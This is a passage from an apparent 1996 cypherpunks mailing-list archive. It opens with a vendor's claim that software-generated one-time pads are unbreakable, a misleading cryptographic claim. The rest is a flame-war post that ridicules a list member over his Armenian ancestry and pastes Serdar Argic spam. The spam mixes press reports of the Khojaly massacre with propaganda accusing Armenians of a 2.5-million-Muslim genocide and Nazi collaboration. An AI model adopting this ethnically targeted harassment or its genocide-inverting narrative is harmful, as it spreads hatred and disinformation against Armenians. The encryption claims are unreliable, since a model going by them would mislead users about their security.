            the inclusionary proof test.

         2. Exclusionary Proof - which is equally valid, and simply
            stated consists of two propositions:

            A. Can any plaintext be encrypted with the OTP? Obviously
               the answer is YES for BOTH both hardware sourced OTPs
               and the IPG software sourced OTPs.

            B. If 2.A is true, is it possible to exclude any
               plaintext possibility?

               Obviously in the case of hardware sourced OTPs,  no
               plain text can possibly be excluded.

               What about the IPG software OTPs?

              . One method that you could theoretically be used to
                exclude a possible plaintext for the software OTP,
                would be to by brute force try all possible keys,
                until the correct one is obtained. That however,
                would be difficult to say the least, as a matter of
                fact it is impossible:

                If every subatomic particle in our known universe was
                a Googol, 1 with 100 zeroes after it, of Cray T3E
                computers - and each of them had been brute forcing a
                partition of the possibilities at the rate of 1
                Googol of them per picosecond which could not be done
                - but assume that it could - and they had been doing
                so since the Big Bang say 20 billion years ago - and
                they were to continue to do so for the next 20
                billion years, that is beyond the life expectancy of
                our solar system/galaxy, and perhaps the universe,
                then approximately 10^322 of the possible OTPs would
                have been tried.

                Thus it would still take 10^34000 times as long as
                that to try all of the possibilities - that is they
                would have tried only one part in 1 with 34000 zeroes
                after it - not theoretical infinity by any means, but
                a very, very large extra-astronomical number. Brute
                force is patently impossible.

               . Another possibility might be to guess it - anyone
                 recognizes that would not be practical, and how
                 would you know that you were right. All of the IPG
                 OTP generator, aka Encryption, keys are themselves
                 OTPs.

               . Another possibility would to be to analytically
                 exclude the invalid possibilities. As stated
                 previously, and as you can discover for yourself,
                 this reduces itself back down to to the exact
                 equivalent of the brute force method set out above.
                 With the algorithm, there is no difference between
                 analytically exclusion and brute forcing - they are
                 one and the same.

         So in fact, any known ciphertext may indeed be an encryption
         of any plaintext of that same, or lesser, length, because you
         cannot prove that it is not a specific plaintext.

         Some will contentiously assert that the key and other
         parameters might be hacked. While we include within the
         system facilitators that reduce that risk to a minimum, and
         to near zero if you use simple precautions, it is true that
         the hacking possibility exists. However, that possibility
         exists for RSA, PGP, hardware sourced OTPs, or any other
         form of security or encryption. We are better positioned in
         that regard than others but in terms of the human element,
         as we all know, there is no such thing as perfection.

         With warmest regards,

         Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 20 Oct 1996 19:13:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <Pine.SUN.3.91.961020193835.6991A-100000@beast.brainlink.com>
Message-ID: <ask5VD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> On Sat, 19 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > Ray Arachelian <sunder@brainlink.com> writes:
> >
> > > Vulis, grow up.
> > >
> > > =========================================================================
> > >  + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/
> > >   \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\
> > > <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/
> > >   /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\
> > >  + v + |God of screwdrivers"|AK|        do you not understand?       |===
> > > ===================http://www.brainlink.COM/~sunder/=====================
> > >       If the Macintosh is a woman...  Then Windows is a Transvestite!
> > >            ActiveX! ActiveX! Format Hard drive? Just say yes!
> >
> > My friend and colleague, Dr. Serdar Argic, has cited the following sources
> > in reference to Ray Arachelian's criminal dandruff-covered grandparents:
>
> <48kb Spam message deleted.>
>
> The friend and colleague of your whom you know says much about you. Yet
> another Net Loon. You action of posting a 48K spam to this list in attempt
> to get me upset has resulted in a single, half-felt yawn.  Others may be
> pissed at your attempt at spamming me.  I give not a shit.

Dr. Serdar Argic is a world-famous historian and Ray makes mistakes in English.

> My original message to you stands: Vulis, grow up.
>
> =============================================================================
>  + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
>   \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
> <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
>   /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
>  + v + |God of screwdrivers"|AK|        do you not understand?       |=======
> ===================http://www.brainlink.COM/~sunder/=========================
>       If the Macintosh is a woman...  Then Windows is a Transvestite!
>            ActiveX! ActiveX! Format Hard drive? Just say yes!
>

My good friend and colleage, Dr. Serdar Argic, has cited these additional
sources regarding Ray Arachelian's criminal dandruff-covered grandparents:

          M A S S A C R E  I N  K H O J A L Y

While the details are argued, this much is plain: something grim
and unconscionable happened in the Azerbaijani town of Khojaly
two weeks ago. So far, some 200 dead Azerbaijanis, many of them
mutilated, have been transported out of the town tucked inside
the Armenian-dominated enclave of Nagorno-Karabakh for burial in
neighboring Azerbaijan. The total number of deaths - the Azerbaijanis
claim 1,324 civilians have been slaughtered, most of them women and
children - is unknown.

Videotapes circulated by the Azerbaijanis include images of defaced
civilians, some of them scalped, others shot in the head.




_BBC1 Morning News at 07.37, Tuesday 3 March 1992_

BBC reporter was live on line and he claimed that he saw more
than 100 bodies of Azeri men, women and children as well as a
baby who are shot dead from their heads from a very short distance.

_BBC1 Morning News at 08:12, Tuesday 3 March 1992_

Very disturbing picture has shown that many civilian corpses
who were picked up from mountain. Reporter said he, cameraman
and Western Journalists have seen more than 100 corpses, who
are men, women, children, massacred by Armenians. They have
been shot dead from their heads as close as 1 meter. Picture
also has shown nearly ten bodies (mainly women and children)
are shot dead from their heads. Azerbaijan claimed that more
than 1000 civilians massacred by Armenian forces.

_Channel 4 News at 19.00, Monday 2 March 1992_

2 French journalists have seen 32 corpses of men, women and
children in civilian clothes. Many of them shot dead from
their heads as close as less than 1 meter.


_Report from Karabakpress_

A merciless massacre of the civilian population of the small
Azeri town of Khojali (Population 6000) in Karabagh, Azerbaijan,
is reported to have taken place on the night of February 28 by
the Soviet Armenian Army. Close to 1000 people are reported to
have been massacred. Elderly and children were not spared. Many
were badly beaten and shot at close range. A sense of rage and
helplessness has overwhelmed the Azeri population in face of the
well armed and equipped Armenian Army. The neighboring Azeri city
of Aghdam outside of the Karabagh region has come under heavy
Armenian artillery shelling. City hospital was hit and two pregnant
women as well as a new born infant were killed. Azerbaijan is appealing
to the international community to condemn such barbaric and ruthless
attacks on its population and its sovereignty.





_Boston Sunday Globe_ November 21, 1993

by Jon Auerbach
Globe Correspondent

CHAKHARLI, Azerbaijan -- The truckloads of scared and lost
children, the sobbing mothers, the stench of sickness and
the sea of blank faces in this mud-covered refugee camp
obscure the deeper issue of why tens of thousands of Azeris
have fled here.

_What we see now is a systematic destruction of every village
 in their way,_ said one senior US official. _It's one of the
 most disgusting things we've seen._

_It's vandalism,_ the US official said. _The idea that there
 is an aggressive intent in a sound conclusion._

The United Nations estimates that there are more than 1 million
refugees in Azerbaijan, roughly one seventh of the former Soviet
republic's entire population. Thousands who fled to neighboring
Iran are being slowly repatriated to refugee camps already bursting
at the seams. But because of the Karabakh Armenians' policy of
burning villages, relief organizations say there is no hope that
the Azeris could return home anytime soon.

At Chakharli, about 10 miles from Iran, more than 10,000 refugees
are crammed into a makeshift tent city. Aziz Azizova, 33, arrived
in the Iranian run camp about three weeks ago, after she and her
five children were forced to flee their home in the village of
Buik-Merjan.

_I left my village with nothing, not even my shoes,_ she said. _You
see how our children are living? Some of them are living right in
the mud._

Azizova, like thousands of others, escaped by fleeing across the Arax
River into neighboring Iran. The UN estimates that around 300 Azeris,
mainly women and children, drowned in the river's currents.

One of the people who did make it across was Samaz Mamedova, a
40-year-old accountant. Sitting with friends in tent No. 566 on
a recent day, Mamedova explained how the Armenians seized her
village in less than a half hour, forcing the entire population
toward the river in a chaotic scramble for survival.




_Cebbar Leygara_ Kurdish Leader - October 13, 1992

 _Today's ethnic cleansing policies by the Serbians against Croatians
  and Muslims of Yugoslavia, as well as the Soviet Republic of Armenia's
  against the Muslim population of neighboring Azerbaijan, are really
  no different in their aspirations than the genocide perpetrated by
  the Armenian Government 78 years ago against the Turkish and Kurdish
  Muslims and Sephardic Jews living in these lands._


_Tovfik Kasimov_ Azeri Leader - September 25, 1992

 _The crime of systematic cleansing by mass killing and extermination
  of the Muslim population in Soviet Republic of Armenia, Karabag,
  Bosnia and Herzegovina is an 'Islamic Holocaust' comparable to the
  extermination of 2.5 million Muslims by the Armenian Government
  during the WWI and of over 6 million European Jews during the WWII._





_The Times_ 3 March 1992


                   MASSACRE UNCOVERED

By ANATOL LIEVEN

More than sixty bodies, including those of women and children,
have been spotted on hillsides in Nagorno-Karabakh, confirming
claims that Armenian troops massacred Azeri refugees. Hundreds
are missing.

Scattered amid the withered grass and bushes along a small valley
and across the hillside beyond are the bodies of last Wednesday's
massacre by Armenian forces of Azerbaijani refugees.

In all, 31 bodies could be counted at the scene. At least another
31 have been taken into Agdam over the past five days. These figures
do not include civilians reported killed when the Armenians stormed
the Azerbaijani town of Khodjaly on Tuesday night. The figures also
do not include other as yet undiscovered bodies

Zahid Jabarov, a survivor of the massacre, said he saw up to 200
people shot down at the point we visited, and refugees who came
by different routes have also told of being shot at repeatedly and
of leaving a trail of bodies along their path. Around the bodies
we saw were scattered possessions, clothing and personnel documents.
The bodies themselves have been preserved by the bitter cold which
killed others as they hid in the hills and forest after the massacre.
All are the bodies of ordinary people, dressed in the poor, ugly
clothing of workers.

Of the 31 we saw, only one policeman and two apparent national
volunteers were wearing uniform. All the rest were civilians,
including eight women and three small children. Two groups,
apparently families, had fallen together, the children cradled
in the women's arms.

Several of them, including one small girl, had terrible head
injuries: only her face was left. Survivors have told how they
saw Armenians shooting them point blank as they lay on the ground.





 THE COMMITTEE FOR PEOPLE'S HELP TO KARABAKH (OF THE) ACADEMY OF
            SCIENCES OF THE AZERBAIJAN SSR - 1988


                  An Appeal to Mankind

During the last three years Azerbaijan and its multinational
population are vainly fighting for justice within the limits of
the Soviet Union. All humanitarian, constitutional human rights
guaranteed by the UN Charter, Universal Declaration of Human
Rights, Helsinki Agreements, Human Problems International Forums,
documents signed by the Soviet Union - all of them are violated.

The USSR's President, government bodies do not defend Azerbaijan
though they are all empowered to take necessary measures to
guarantee life and peace.

The 240,000 strong army of Armenian terrorists with Moscow's
tacit consent wages an undeclared war of annihilation against
Azerbaijan. As a result, a part of Azerbaijan has been occupied
and annexed, thousands of people killed, thousands wounded.

Some 400,000 Azerbaijanis have been brutally and inhumanly
deported from the Armenian SSR, their historical homeland.
Together with them 64,000 Russians and 62,000 Kurds have also
been driven out, a part of them now settled in Azerbaijan.
Some 80,000 Turkish-Meskhetians, Lezghins and representatives
of other Caucasian nationalities who escaped from the Central
Asia where the President and government bodies did not guarantee
them the life and peace also suffered from these deportations.

One of the scandalous vandalisms directed not only against
Azerbaijan science but the world civilization as well is the
Armenian extremists' destruction of the Karabakh scientific
experimental base of The Institute of Genetics and Selection
of the Academy of Sciences of the Azerbaijan SSR.

We beg you for humanitarian help and political assistance,
for the honour and dignity of 7 million Azerbaijanis are
violated, its territory, culture  and history are trampled,
its people are shot. There is persistent negative image of
Azerbaijanians abroad, and this defamation is spread over
the whole world by Soviet mass media, Armenian lobby in the
USSR and the United States.

We are for a united, indivisible, sovereign Azerbaijan, we
are for a common Caucasian home proclaimed in 1918 by one
of the founding fathers of the Azerbaijan Democratic
Republic - Muhammed Emin Rasulzade.

But all these goals and expectations are trampled upon the
Soviet leadership in favour of the Armenian expansionists
encouraged by Moscow and intended to create a new '1,000
Year Reich' - the 'Great Armenia' - by annexing the
neighboring lands.

The world public opinion shed tears to save the whales,
suffers for penguins dying out in the Antarctic Continent.

But what about the lives of seven million human beings?
If these people are Muslims, does it mean that they are
less valuable? Can people be discriminated by their
colour of skin or religion, by their residence or other
attributes?

All people are brothers, and we appeal to our brothers
for help and understanding. This is not the first appeal
of Azerbaijan to the world public opinion. Our previous
appeals were unheard. However, we still carry the hope
that the truth beyond the Russian and Armenian propaganda
will one day reveal the extent of our suffering and
stimulate at least as much help and compassion for
Azerbaijan as tendered to whales and penguins.




        _The Age_ Melbourne, 6/3/92

        By Helen WOMACK  - Agdam, Azerbaijan, Thursday


 The exact number of victims is still unclear, but there can
 be little doubt that Azeri civilians were massacred by Armenian
 Army in the snowy mountains of Nagorno-Karabakh last week.

 Refugees from the enclave town of Khojaly, sheltering in the
 Azeri border town of Agdam, give largely consistent accounts
 of how Armenians attacked their homes on the night of 25 February,
 chased those who fled and shot them in the surrounding forests.
 Yesterday, I saw 75 freshly dug graves in one cemetery in addition
 to four mutilated corpses we were shown in the mosque when we
 arrived in Agdam late on Tuesday. I also saw women and children
 with bullet wounds in a makeshift hospital in a string of railway
 carriages.

 Khojaly, an Azeri settlement in the enclave mostly populated by
 Armenians, had a population of about 6000. Mr. Rashid Mamedov
 Commander of Police in Agdam, said only about 500 escaped to his
 town. _So where are the rest?_. Some might have taken prisoner,
 he said, or fled. Many bodies were still lying in the mountains
 because the Azeris were short of helicopters to retrieve them.
 He believed more than 1000 had perished, some of cold in temperatures
 as low as minus 10 degrees.

 When Azeris saw the Armenians with a convoy of armored personnel
 carriers, they realised they could not hope to defend themselves,
 and fled into the forests. In the small hours, the massacre started.

 Mr. Nasiru, who believes his wife and two children were taken
 prisoner, repeated what many other refugees have said - that
 troops of the former Soviet army helped the Armenians to attack
 Khojaly. _It is not my opinion, I saw it with my own eyes._






_The Washington Post_ 2/28/92

_Nagorno-Karabagh Victims Buried in Azerbaijani Town_

"Refugees claim hundreds died in Armenian Attack...Of seven bodies
 seen here today, two were children and three were women, one shot
 through the chest at what appeared to be close range. Another 120
 refugees being treated at Agdam's hospital include many with multiple
 stab wounds."


_The New York Times_ 3/6/92

_A Final Goodbye in Azerbaijan_

[Photo by Associated Press]: "At a cemetery in Agdam, Azerbaijan,
family members and friends grieved during the burial of victims
massacred by the Armenians in Nagorno-Karabagh. Chingiz Iskandarov,
right, hugged the coffin containing the remains of his brother, one
of the victims. A copy of Koran lay atop the coffin."


_The Washington Post_ 3/6/92

_Final Embrace_

[Photo by Associated Press]: "Chingiz Iskenderov, right, weeps over
coffin holding the remains of his brother as other relatives grieve
at an Azarbaijani cemetery yesterday amid burial of victims killed
by Armenians in Nagorno-Karabagh."



_The Washington Times_ 3/2/92

_Armenian Raid Leaves Azeris Dead or Fleeing_

"...about 1,000 of Khojaly's 10,000 people were massacred by the
 Armenian Army in Tuesdays attack. Azerbaijani television showed
 truckloads of corpses being evacuated from the Khocaly area."


_The Independent_ 2/29/92

By Helen Womack

"Elif Kaban, a Reuter correspondent in Agdam, reported that after
 a massacre on Wednesday, Azeris were burying scores of people who
 died when Armenians overran the town of Khojaly, the second-biggest
 Azeri settlement in the area. 'The world is turning its back on
 what's happening here. We are dying and you are just watching,'
 one mourner shouted at a group of journalists."


 _Reuters_ 2/12/92

_Armenians Burn Azeri Village_

"Armenian Army attacked a strategic Azeri village...in Nagorno-Karabagh
 and burned it to the ground on Tuesday, Commonwealth television reported.
 Channel one television said the village of Malybeili, in the Khodzhalin
 district, was now cut off and a large number of wounded were left stranded.
 Itar-Tass news agency said several people were killed and 20 wounded in
 the attack on the village... Tass also said shells fired from Armenian
 villages into the Azeri populated town of Susha, just 6 miles south of
 Stepenakert, demolished two houses and damaged five others."




 _The Washington Times_ 3/3/92

_Massacre Reports Horrify Azerbaijan_

"Azeri officials who returned from the scene to this town about
 nine miles away brought back three dead children, the backs of
 their heads blown off...'Women and children had been scalped,'
 said Assad Faradzev, an aide to Karabagh's Azeri governor. Azeri
 television showed pictures of one truckload of bodies brought to
 the Azeri town of Agdam, some with their faces apparently scratched
 with knives or their eyes gouged out."


_The Washington Post_ 3/3/92

_Killings Rife in Nagorno-Karabagh_

"Journalists in the area reported seeing dozens of corpses, including
 some of the civilians, and Azerbaijani officials said Armenians began
 shooting at them when they sought to recover the bodies."


_The Times (London)_ 3/3/92

_Bodies Mark Site of Karabagh Massacre_

"A local truce was enforced to allow the Azerbaijanis to collect
 their dead and any refugees still hiding in the hills and forest.
 All are the bodies of ordinary people, dressed in the poor, ugly
 clorhing of workers...All the rest were civilians, including eight
 women and three small children. Two groups, apparently families,
 had fallen together, the children cradled in the women's arms.
 Several of them, including one small girl, had terrible head
 injuries: only her face was left. Survivors have told how they
 saw Armenians shooting them point blank as they lay on the ground."




 _The SUNDAY TIMES_ 8 March 1992

 Thomas Goltz, the first to report the massacre by Armenian soldiers,
 reports from Agdam.

 Khojaly used to be a barren Azeri town, with empty shops and treeless
 dirt roads. Yet it was still home to thousands of Azeri people who, in
 happier times, tended fields and flocks of geese. Last week it was wiped
 off the map.

 As sickening reports trickled in to the Azerbaijani border town of
 Agdam, and the bodies piled up in the morgues, there was little doubt
 that Khojaly and the stark foothills and gullies around it had been
 the site of the most terrible massacre since the Soviet Union broke
 apart.

 I was the last Westerner to visit Khojaly. That was in january and
 people were predicting their fate with grim resignation. Zumrut Ezoya,
 a mother of four on board the helicopter that ferried us into the
 town, called her community "sitting ducks, ready to get shot". She and
 her family were among the victims of the massacre by the Armenians on
 February 26.

 "The Armenians have taken all the outlying villages, one by one, and
 the government does nothing." Balakisi Sakikov, 55, a father of five,
 said. "Next they will drive us out or kill us all," said Dilbar, his
 wife. The couple, their three sons and three daughters were killed in
 the massacre, as were many other people I had spoken to.

 "It was close to the Armenian lines we knew we would have to cross.
 There was a road, and the first units of the column ran across then
 all hell broke loose. Bullets were raining down from all sides. we had
 just entered their trap."

 The azeri defenders picked off one by one. Survivors say that Armenian
 forces then began a pitiless slaughter, firing at anything moved in
 the gullies. A video taken by an Azeri cameraman, wailing and crying
 as he filmed body after body, showed a grizzly trail of death leading
 towards higher, forested ground where the villagers had sought refuge
 from the Armenians.

 "The Armenians just shot and shot and shot," said Omar Veyselov, lying
 in hospital in Agdam with sharapnel wounds. "I saw my wife and daughter
 fall right by me."

 People wandered through the hospital corridors looking for news of the
 loved ones. Some vented their fury on foreigners: " Where is my daughter,
 where is my son ?" wailed a mother. "Raped. Butchered. Lost."



_The Independent_ London, 12/6/92


_Painful Search_

The gruesome extent of February's killings of Azeris by Armenians
in the town  of Hojali is at last emerging  in Azerbaijan - about
600 men,  women and  children dead.

The State Prosecutor, Aydin Rasulov,  the cheif investigator of a
15-man  team  looking  into  what Azerbaijan  calls  the  "Hojali
Massacre", said  his figure of 600  people dead was a  minimum on
preliminary  findings.  A similar  estimate  was  given by  Elman
Memmedov, the mayor of Hojali. An  even higher one was printed in
the Baku newspaper  Ordu in May - 479 dead  people named and more
than 200 bodies reported unidentified.  This figure of nearly 700
dead is quoted as official by Leila Yunusova, the new spokeswoman
of the Azeri Ministry of Defence.

FranCois Zen  Ruffinen, head  of delegation of  the International
Red Cross  in Baku, said  the Muslim imam  of the nearby  city of
Agdam had reported a figure of  580 bodies received at his mosque
from  Hojali, most  of  them  civilians. "We  did  not count  the
bodies. But  the figure seems  reasonable. It is no  fantasy," Mr
Zen Ruffinen said. "We have some idea since we gave the body bags
and products to wash the dead."

Mr  Rasulov endeavours  to give  an unemotional  estimate of  the
number of  dead in the  massacre. "Don't  get worked up.  It will
take  several months  to  get a  final  figure," the  43-year-old
lawyer said at his small office.

Mr Rasulov  knows about these  things. It  took him two  years to
reach  a firm  conclusion that  131  people were  killed and  714
wounded  when  Soviet  troops  and tanks  crushed  a  nationalist
uprising in Baku in January 1990.

Officially, 184 people have so  far been certified as dead, being
the  number of  people that  could be  medically examined  by the
republic's forensic department. "This  is just a small percentage
of the dead," said Rafiq Youssifov, the republic's chief forensic
scientist. "They were the only bodies brought to us. Remember the
chaos and the fact that we are  Muslims and have to wash and bury
our dead within 24 hours."

Of these 184 people, 51 were women, and 13 were children under 14
years old.  Gunshots killed  151 people,  shrapnel killed  20 and
axes or  blunt instruments  killed 10.  Exposure in  the highland
snows killed the last three.  Thirty-three people showed signs of
deliberate mutilation, including ears,  noses, breasts or penises
cut off and  eyes gouged out, according  to Professor Youssifov's
report. Those 184 bodies examined were less than a third of those
believed to have been killed, Mr Rasulov said.

"There were too many bodies of  dead and wounded on the ground to
count properly: 470-500  in Hojali, 650-700 people  by the stream
and the road and 85-100  visible around Nakhchivanik village," Mr
Manafov  wrote in  a  statement countersigned  by the  helicopter
pilot.

"People waved up  to us for help. We saw  three dead children and
one  two-year-old alive  by  one  dead woman.  The  live one  was
pulling at her arm for the mother to get up. We tried to land but
Armenians started a barrage against  our helicopter and we had to
return."

There  has been  no consolidation  of  the lists  and figures  in
circulation because  of the political  upheavals of the  last few
months and the  fact that nobody knows exactly who  was in Hojali
at the time - many inhabitants were displaced from other villages
taken over by Armenian forces.




_The Independent_ London, 12/6/92

Photographs: Liu Heung / AP
             Frederique Lengaigne / Reuter

Aref  Sadikov sat  quietly  in the  shade of  a  cafe-bar on  the
Caspian Sea  esplanade of Baku and  showed a line of  stitches in
his trousers, torn  by an Armenian bullet as he  fled the town of
Hojali just over three months ago, writes Hugh Pope.

"I'm still  wearing the same  clothes, I don't have  any others,"
the  51-year-old carpenter  said,  beginning his  account of  the
Hojali disaster. "I was wounded in five places, but I am lucky to
be alive."

Mr Sadikov and  his wife were short of  food, without electricity
for more than a month, and cut off from helicopter flights for 12
days. They  sensed the  Armenian noose was tightening  around the
2,000 to  3,000 people left in  the straggling Azeri town  on the
edge of Karabakh.

"At about 11pm  a bombardment started such as we  had never heard
before,  eight  or  nine   kinds  of  weapons,  artillery,  heavy
machine-guns, the lot," Mr Sadikov said.

Soon neighbours were  pouring down the street  from the direction
of  the  attack. Some  huddled  in  shelters but  others  started
fleeing the town,  down a hill, through a stream  and through the
snow into a forest on the other side.

To escape, the  townspeople had to reach the Azeri  town of Agdam
about 15  miles away. They  thought they  were going to  make it,
until at  about dawn  they reached a  bottleneck between  the two
Azeri villages of Nakhchivanik and Saderak.

"None of my group was hurt up to then ... Then we were spotted by
a  car on  the road,  and the  Armenian outposts  started opening
fire," Mr Sadikov said. Mr Sadikov said only  10 people  from his
group of  80 made it  through, including his wife  and militiaman
son.  Seven  of  his  immediate  relations  died,  including  his
67-year-old elder brother.

"I only had time to reach down  and cover his face with his hat,"
he said, pulling his own big  flat Turkish cap over his eyes. "We
have never got any of the bodies back."

The first groups were lucky to have the benefit of covering fire.
One hero  of the  evacuation, Alif  Hajief, was  shot dead  as he
struggled to change  a magazine while covering  the third group's
crossing, Mr Sadikov said.

Another hero,  Elman Memmedov, the  mayor of Hojali, said  he and
several others  spent the whole day  of 26 February in  the bushy
hillside, surrounded by  dead bodies as they tried  to keep three
Armenian armoured personnel carriers at bay.

As the  survivors staggered the  last mile into Agdam,  there was
little comfort  in a town from  which most of the  population was
soon to flee.

"The night  after we reached  the town  there was a  big Armenian
rocket attack. Some people just  kept going," Mr Sadikov said. "I
had to  get to the  hospital for treatment. I  was in a  bad way.
They even found a bullet in my sock."

Victims of massacre: An Azeri woman mourns her son, killed in the
Hojali massacre in February  (left). Nurses struggle in primitive
conditions  (centre)  to  save  a  wounded  man  in  a  makeshift
operating  theatre set  up  in a  train carriage.  Grief-stricken
relatives in  the town of Agdam  (right) weep over the  coffin of
another of the massacre victims. Calculating the final death toll
has been  complicated because Muslims  bury their dead  within 24
hours.



Amnesty International
International Secretariat
1 Easton Street
London WC1X 8DJ
United Kingdom

22 APRIL 1994

ARMENIA - MUSLIM PRISONERS MURDERED IN "EXECUTION-TYPE SHOOTINGS"

Forensic evidence released this month suggests that six Azerbaydzhani
prisoners of war held in Armenia were victims of "execution-type
shootings", according to a forensic expert.

Following an announcement, in February, by the Armenian Foreign
Ministry that eight Azerbaydzhani prisoners had been shot while
attempting to escape, ten bodies were transferred from Armenia
to Azerbaydzhan in March. Professor Derrick Pounder, head of the
Department of Forensic Medicine at the University of Dundee,
United Kingdom, began post- mortem examinations on the bodies
at the beginning of April. The bodies had also undergone previous
examinations by both the Armenians and the Azeris.

He found that six of the men - Rustam Ramazan ogly Agev, Elehan Guseyn
ogly Akhmedov, Elman Mamed ogly Akhmedov, Kurchat Kiyaz ogly Mamedov,
Eldar Chakhbaba ogly Mamedov and Faig Gabil ogly Guliyev - had been
murdered by a single gunshot wound to the head.  He also found that
in three of the six cases the muzzle of the gun had been in contact
with the head at the time the shot was fired.  It was not possible
to determine the range at which the shot had been fired in the other
three cases owing to earlier removal of physical evidence.

Professor Pounder concluded that the pattern of gunshot wounds was
not consistent with allegations that the six men had been shot while
attempting to escape, and said that the common pattern of the wounds
was "strongly suggestive of execution-type shootings".

Amnesty International is urging the Armenian authorities to conduct
a prompt, impartial and thorough investigation into the deaths of
these six men, to make the findings public, and to bring to justice
any perpetrators of execution-style killings, within the bounds of
international law.

The human rights organization is also urging the Armenian authorities
to investigate the circumstances surrounding the deaths of the remaining
four men whose bodies were returned, in order to determine if criminal
proceedings are necessary in their cases also.

Professor Pounder found that one of these had wounds to the throat in
a pattern of injury consistent with suicide, one died of a single gunshot
wound to the chest, and in two instances the cause of death could not
be determined.




                   HUMAN RIGHTS WATCH  HELSINKI
                               Formerly
485 FIFTH AVENUE,NEW YORK,NY 10017-6104, TEL(212)972-8400,FAX(212)
972-0905,EMAIL;hrwatchnycigc.apc.org.
1522 K  STREET,NW,H910,WASHINGTON,DC 20005-1202,TEL(202)371-6592,
FAX(202)371-0124,EMAIL,hrwatchdc  igc apc.org
90 BOROUGH HIGH STREET,LONDON UK SE1 ILL,TEL(71)378-8008,FAX (71)
378-8029,EMAIL:hrwatchuk  gn apc org
MOSCOW, RUSSIAN FEDERATION, TEL and FAX(7095)265-4448

                                             MARCH 2, 1994
       PRESIDENT LEVON TER-PETROSSIAN
       MARSHAL BAGRAMIAN PROSPECT,26
       375019 YEREVAN
       BY FAX:52-15-81

       DEAR PRESIDENT TER-PETROSSIAN,

HUMAN RIGHTS WATCH\HELSINKI (Formerly Helsinki Watch) is the
largest human rights organisation in the United States. We have
closely followed the Armenian massacre of the Azeri people in
Nagorno Karabakh, and have published two reports on violations
of the Geneva Conventions.

I am writing you to express our organisation's deep concern
about the deaths of Azerbaijani prisoners of war in Armenia.
According to the International Committee of the Red Cross, the
following men were shot to death in an Armenian detention camp
in Sritak in late January or early February:

     Rustam Ramazan-oglu Agaev,(birthdate unknown), from Masalin
     District
     Elman Mamed-oglu Akhmedov,b. 1961,from Yevlakh District
     Elshan Hussein-oglu Akhmedov,b.1974, from Saatlin District
     Bakhram AKIF-oglu Giiasov,b. 1972,from Siazan
     FAIG Gabil-oglu Guliev,b.1969,from Baku
     Enver Asker-oglu Jafarov,b.1972,from Sumgait
     Eldar Shahbaba-oglu Mamedov,b.1966,from Baku
     Girshad Kniaz-oglu Mamedov,b.1974 from Yevlakh

I thank you for your attention to this matter and look forward
to learning the results of the investigation.

                                                 Yours sincerely,
                                                   Jeri  Laber
                                                  Executive Director


_Newsweek_ November 29, 1993, p. 50

_For the past seven months Armenian troops and tanks have swept
 across Azerbaijan -- a land grab exceeded only by what the Serbs
 have accomplished in Bosnia in the past year...Last month they
 pushed south all the way to the Iranian border, driving more
 than 60,000 Azerbaijani civilians across the Araks river into
 Iran -- and looting and torching vacant villages in their wake._



Christopher Walker, _Armenia_ New York (St. Martin's Press), 1980.

This generally pro-Armenian work contains the following information
of direct relevance to the Nazi Holocaust:

1) Dro (the Butcher), the former dictator of ex-Russian/Soviet Armenia
and the architect of the Armenian genocide of 2.5 million Muslims in
Russian Armenia and Eastern Anatolia, the most respected of Nazi Armenian
leaders, established an Armenian Provisional Republic in Berlin during
World War II;

2) this _provisional government_ fully endorsed and espoused the social
theories of the Nazis, declared themselves and all Armenians to be members
of the Aryan _Super-Race_;

3) they published an Anti-Semitic, racist journal, thereby aligning
themselves with the Nazis and their efforts to exterminate the Jews;
and,

4) they mobilized an Armenian Army of up to 30,000 members which fought
side by side with the Wehrmacht.



_San Francisco Chronicle_ (December 11, 1983)
                          (Editor's Mailbox - Section B)

_We have first hand information and evidence of Armenian
 atrocities against our people (Jews). Members of our family
 witnessed the murder of 148 members of our family near Erzurum,
 Turkey, by Armenian neighbors, bent on destroying anything and
 anybody remotely Jewish and/or Muslim...Armenians were in league
 with Hitler in the last war, on his premise to grant themselves
 government if, in return, the Armenians would help exterminate
 Jews. Armenians were also hearty proponents of the anti-Semitic
 acts in league with the Russian Communists._

Signed Elihu Ben Levi, Vacaville, California.




The Armenian publication in Germany, Hairenik (an official mouthpiece
for the ex-Soviet Armenian Government), carried statements as follows:[*]

_Sometimes it is difficult to eradicate these poisonous elements [the
 Jews] when they have struck deep root like a chronic disease, and when
 it becomes necessary for a people [the Nazis] to eradicate them in an
 uncommon method, these attempts are regarded as revolutionary. During
 the surgical operation, the flow of blood is a natural thing._[**]

[*]  James G. Mandalian, _Dro, Drastamat Kanayan,_ in the 'Armenian
     Review,' a Quarterly by the Hairenik Association, Inc., Summer:
     June 1957, Vol. X, No. 2-38.

[**] Quoted by James Mandalian: _Who Are The Dashnags?_ Boston,
     Hairenik Press, 1944, pp. 13-4.




_These European Armenians, with headquarters in Berlin, appealed
 to, and bargained with Hitler's emissaries for an 'independent'
 Armenian state. That they had to bootlick Nazi masters goes without
 saying. That, as potential officials of a puppet Nazi state, they
 would have assumed the infamous roles of the Paveliches, Antonescus,
 Lavals, Tisos or Vidkun Quislings was also a foregone conclusion.
 Once committed to it, there was no alternative to the price for
 'independence' except subservience to Hitler._[*]

[*]  Arthur Derounian under the pseudonym 'John Roy Carlson,'
    _Armenian Affairs_ a Quarterly Journal of Armenian Studies,
     Winter 1949-50, p. 18.


  'After all, who remembers today the extermination of the Tartars?'
         (Adolf Hitler, August 22, 1939: Ruth W. Rosenbaum)
         _The Muslim Holocaust - Musluman Soykirimi_ p. 213.
